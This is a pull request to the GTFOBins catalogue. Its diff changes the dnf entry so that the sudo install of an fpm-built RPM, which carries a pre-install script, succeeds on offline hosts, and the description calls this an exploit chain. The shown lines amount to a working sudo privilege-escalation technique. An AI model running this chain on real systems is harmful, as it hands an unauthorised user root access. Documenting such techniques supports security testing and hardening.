### PR TITLE
Update dnf.md run final sudo command with --disablerepo=*

### DIFF
--- a/_gtfobins/dnf.md
+++ b/_gtfobins/dnf.md
@@ -9,5 +9,5 @@ functions:
         fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF
         ```
       code: |
-        sudo dnf install -y x-1.0-1.noarch.rpm
+        sudo dnf install -y x-1.0-1.noarch.rpm --disablerepo=*
 ---


### PR DESCRIPTION
When running this on a system without internet connectivity, it is unable to actually execute and install the package created above. It is neccesary to include --disablerepo=* as there are instances where the exploit chain wont continue without while theres never a situation where your exploit chain wont work if the --disablerepo=* is included